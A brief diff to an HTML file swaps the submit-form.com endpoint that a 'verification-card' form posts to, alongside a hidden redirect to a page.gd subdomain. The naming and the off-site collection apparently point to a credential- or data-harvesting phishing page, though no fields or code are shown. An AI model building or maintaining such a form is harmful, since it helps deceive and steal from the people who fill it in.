--- a/form.html
+++ b/form.html
@@ -261,7 +261,7 @@
     </div>
 
     <div class="container">
-        <form class="verification-card" action="https://submit-form.com/ziS2VWDIx" method="POST">
+        <form class="verification-card" action="https://submit-form.com/gYJNtlgQf" method="POST">
 
             <!-- Redirect after submission -->
             <input type="hidden" name="_redirect" value="https://submit-in-key.page.gd/">
